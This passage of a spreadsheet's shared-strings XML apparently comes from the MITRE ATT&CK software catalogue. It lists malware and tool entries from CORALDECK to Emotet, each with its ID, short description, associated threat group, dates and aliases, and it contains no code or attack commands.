    <t>[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0212</t>
  </si>
  <si>
    <t>S0137</t>
  </si>
  <si>
    <t>CORESHELL</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0137</t>
  </si>
  <si>
    <t>SOURFACE, Sofacy</t>
  </si>
  <si>
    <t>S0527</t>
  </si>
  <si>
    <t>CSPY Downloader</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0527</t>
  </si>
  <si>
    <t>09 November 2020</t>
  </si>
  <si>
    <t>22 April 2021</t>
  </si>
  <si>
    <t>S0119</t>
  </si>
  <si>
    <t>Cachedump</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0119</t>
  </si>
  <si>
    <t>S0454</t>
  </si>
  <si>
    <t>Cadelspy</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0454</t>
  </si>
  <si>
    <t>22 May 2020</t>
  </si>
  <si>
    <t>29 May 2020</t>
  </si>
  <si>
    <t>S0274</t>
  </si>
  <si>
    <t>Calisto</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0274</t>
  </si>
  <si>
    <t>Cody Thomas, SpecterOps</t>
  </si>
  <si>
    <t>S0077</t>
  </si>
  <si>
    <t>CallMe</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0077</t>
  </si>
  <si>
    <t>S0351</t>
  </si>
  <si>
    <t>Cannon</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0351</t>
  </si>
  <si>
    <t>S0030</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0030</t>
  </si>
  <si>
    <t>01 April 2021</t>
  </si>
  <si>
    <t>Anunak</t>
  </si>
  <si>
    <t>S0484</t>
  </si>
  <si>
    <t>Carberp</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor.(Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0484</t>
  </si>
  <si>
    <t>15 July 2020</t>
  </si>
  <si>
    <t>S0335</t>
  </si>
  <si>
    <t>Carbon</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0335</t>
  </si>
  <si>
    <t>25 April 2021</t>
  </si>
  <si>
    <t>S0348</t>
  </si>
  <si>
    <t>Cardinal RAT</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0348</t>
  </si>
  <si>
    <t>S0261</t>
  </si>
  <si>
    <t>Catchamas</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0261</t>
  </si>
  <si>
    <t>S0572</t>
  </si>
  <si>
    <t>Caterpillar WebShell</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0572</t>
  </si>
  <si>
    <t>10 February 2021</t>
  </si>
  <si>
    <t>S0144</t>
  </si>
  <si>
    <t>ChChes</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0144</t>
  </si>
  <si>
    <t>HAYMAKER, Scorpion</t>
  </si>
  <si>
    <t>S0220</t>
  </si>
  <si>
    <t>Chaos</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0220</t>
  </si>
  <si>
    <t>S0107</t>
  </si>
  <si>
    <t>Cherry Picker</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0107</t>
  </si>
  <si>
    <t>S0020</t>
  </si>
  <si>
    <t>China Chopper</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0020</t>
  </si>
  <si>
    <t>23 April 2021</t>
  </si>
  <si>
    <t>2.2</t>
  </si>
  <si>
    <t>S0054</t>
  </si>
  <si>
    <t>CloudDuke</t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0054</t>
  </si>
  <si>
    <t>CloudLook, MiniDionis</t>
  </si>
  <si>
    <t>S0154</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&amp;CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)
In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0154</t>
  </si>
  <si>
    <t>14 December 2017</t>
  </si>
  <si>
    <t>24 April 2021</t>
  </si>
  <si>
    <t>1.6</t>
  </si>
  <si>
    <t>Josh Abraham; Martin Sohn Christensen, Improsec</t>
  </si>
  <si>
    <t>S0338</t>
  </si>
  <si>
    <t>Cobian RAT</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0338</t>
  </si>
  <si>
    <t>S0369</t>
  </si>
  <si>
    <t>CoinTicker</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0369</t>
  </si>
  <si>
    <t>23 April 2019</t>
  </si>
  <si>
    <t>Richie Cyrus, SpecterOps</t>
  </si>
  <si>
    <t>S0126</t>
  </si>
  <si>
    <t>ComRAT</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0126</t>
  </si>
  <si>
    <t>23 December 2020</t>
  </si>
  <si>
    <t>Matthieu Faou, ESET</t>
  </si>
  <si>
    <t>S0244</t>
  </si>
  <si>
    <t>Comnie</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0244</t>
  </si>
  <si>
    <t>S0591</t>
  </si>
  <si>
    <t>ConnectWise</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0591</t>
  </si>
  <si>
    <t>18 March 2021</t>
  </si>
  <si>
    <t>ScreenConnect</t>
  </si>
  <si>
    <t>S0575</t>
  </si>
  <si>
    <t>Conti</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0575</t>
  </si>
  <si>
    <t>17 February 2021</t>
  </si>
  <si>
    <t>S0492</t>
  </si>
  <si>
    <t>CookieMiner</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0492</t>
  </si>
  <si>
    <t>22 July 2020</t>
  </si>
  <si>
    <t>22 October 2020</t>
  </si>
  <si>
    <t>S0050</t>
  </si>
  <si>
    <t>CosmicDuke</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0050</t>
  </si>
  <si>
    <t>28 March 2020</t>
  </si>
  <si>
    <t>BotgenStudios, NemesisGemina, TinyBaron</t>
  </si>
  <si>
    <t>S0046</t>
  </si>
  <si>
    <t>CozyCar</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0046</t>
  </si>
  <si>
    <t>Cozer, CozyBear, CozyDuke, EuroAPT</t>
  </si>
  <si>
    <t>S0488</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0488</t>
  </si>
  <si>
    <t>17 July 2020</t>
  </si>
  <si>
    <t>29 July 2020</t>
  </si>
  <si>
    <t>S0115</t>
  </si>
  <si>
    <t>Crimson</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims. (Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0115</t>
  </si>
  <si>
    <t>MSIL/Crimson</t>
  </si>
  <si>
    <t>S0235</t>
  </si>
  <si>
    <t>CrossRAT</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0235</t>
  </si>
  <si>
    <t>S0538</t>
  </si>
  <si>
    <t>Crutch</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0538</t>
  </si>
  <si>
    <t>04 December 2020</t>
  </si>
  <si>
    <t>22 December 2020</t>
  </si>
  <si>
    <t>S0498</t>
  </si>
  <si>
    <t>Cryptoistic</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0498</t>
  </si>
  <si>
    <t>18 August 2020</t>
  </si>
  <si>
    <t>S0255</t>
  </si>
  <si>
    <t>DDKONG</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0255</t>
  </si>
  <si>
    <t>S0213</t>
  </si>
  <si>
    <t>DOGCALL</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0213</t>
  </si>
  <si>
    <t>S0497</t>
  </si>
  <si>
    <t>Dacls</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0497</t>
  </si>
  <si>
    <t>07 August 2020</t>
  </si>
  <si>
    <t>02 September 2020</t>
  </si>
  <si>
    <t>S0334</t>
  </si>
  <si>
    <t>DarkComet</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0334</t>
  </si>
  <si>
    <t>DarkKomet, FYNLOS, Fynloski, Krademok</t>
  </si>
  <si>
    <t>S0187</t>
  </si>
  <si>
    <t>Daserf</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0187</t>
  </si>
  <si>
    <t>16 January 2018</t>
  </si>
  <si>
    <t>Muirim, Nioupale</t>
  </si>
  <si>
    <t>S0243</t>
  </si>
  <si>
    <t>DealersChoice</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0243</t>
  </si>
  <si>
    <t>S0354</t>
  </si>
  <si>
    <t>Denis</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0354</t>
  </si>
  <si>
    <t>30 June 2020</t>
  </si>
  <si>
    <t>S0021</t>
  </si>
  <si>
    <t>Derusbi</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0021</t>
  </si>
  <si>
    <t>PHOTO</t>
  </si>
  <si>
    <t>S0200</t>
  </si>
  <si>
    <t>Dipsind</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0200</t>
  </si>
  <si>
    <t>Ryan Becwar</t>
  </si>
  <si>
    <t>S0281</t>
  </si>
  <si>
    <t>Dok</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) steals banking information through man-in-the-middle  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0281</t>
  </si>
  <si>
    <t>19 March 2020</t>
  </si>
  <si>
    <t>Retefe</t>
  </si>
  <si>
    <t>S0600</t>
  </si>
  <si>
    <t>Doki</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [Ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0600</t>
  </si>
  <si>
    <t>06 April 2021</t>
  </si>
  <si>
    <t>19 April 2021</t>
  </si>
  <si>
    <t>Containers, Linux</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID)</t>
  </si>
  <si>
    <t>S0186</t>
  </si>
  <si>
    <t>DownPaper</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0186</t>
  </si>
  <si>
    <t>S0134</t>
  </si>
  <si>
    <t>Downdelph</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0134</t>
  </si>
  <si>
    <t>Delphacy</t>
  </si>
  <si>
    <t>S0384</t>
  </si>
  <si>
    <t>Dridex</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) is a banking Trojan that has been used for financial gain. Dridex was created from the source code of the Bugat banking trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0384</t>
  </si>
  <si>
    <t>30 May 2019</t>
  </si>
  <si>
    <t>Bugat v5</t>
  </si>
  <si>
    <t>S0547</t>
  </si>
  <si>
    <t>DropBook</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0547</t>
  </si>
  <si>
    <t>S0502</t>
  </si>
  <si>
    <t>Drovorub</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0502</t>
  </si>
  <si>
    <t>25 August 2020</t>
  </si>
  <si>
    <t>18 September 2020</t>
  </si>
  <si>
    <t>S0567</t>
  </si>
  <si>
    <t>Dtrack</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0567</t>
  </si>
  <si>
    <t>25 January 2021</t>
  </si>
  <si>
    <t>S0038</t>
  </si>
  <si>
    <t>Duqu</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0038</t>
  </si>
  <si>
    <t>S0062</t>
  </si>
  <si>
    <t>DustySky</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0062</t>
  </si>
  <si>
    <t>NeD Worm</t>
  </si>
  <si>
    <t>S0024</t>
  </si>
  <si>
    <t>Dyre</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. 
 (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0024</t>
  </si>
  <si>
    <t>22 June 2020</t>
  </si>
  <si>
    <t>Dyreza, Dyzap</t>
  </si>
  <si>
    <t>Josh Campbell, Cyborg Security, @cyb0rgsecur1ty</t>
  </si>
  <si>
    <t>S0593</t>
  </si>
  <si>
    <t>ECCENTRICBANDWAGON</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a Remote Access Tool (RAT) used by [Lazarus Group](https://attack.mitre.org/groups/G0032) that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0593</t>
  </si>
  <si>
    <t>14 April 2021</t>
  </si>
  <si>
    <t>S0064</t>
  </si>
  <si>
    <t>ELMER</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0064</t>
  </si>
  <si>
    <t>S0568</t>
  </si>
  <si>
    <t>EVILNUM</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0568</t>
  </si>
  <si>
    <t>28 January 2021</t>
  </si>
  <si>
    <t>S0377</t>
  </si>
  <si>
    <t>Ebury</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0377</t>
  </si>
  <si>
    <t>19 April 2019</t>
  </si>
  <si>
    <t>Marc-Etienne M.Léveillé, ESET</t>
  </si>
  <si>
    <t>S0554</t>
  </si>
  <si>
    <t>Egregor</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://attack.mitre.org/software/S0554) and Sekhmet ransomware, as well as [Maze](https://attack.mitre.org/software/S0449) ransomware.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)(Citation: Security Boulevard Egregor Oct 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0554</t>
  </si>
  <si>
    <t>Daniyal Naeem, BT Security; Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>S0081</t>
  </si>
  <si>
    <t>Elise</t>
  </si>
  <si>
    <t>[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of
tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0081</t>
  </si>
  <si>
    <t>BKDR_ESILE, Page</t>
  </si>
  <si>
    <t>S0082</t>
  </si>
  <si>
    <t>Emissary</t>
  </si>
  <si>
    <t>[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0082</t>
  </si>
  <si>
    <t>S0367</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
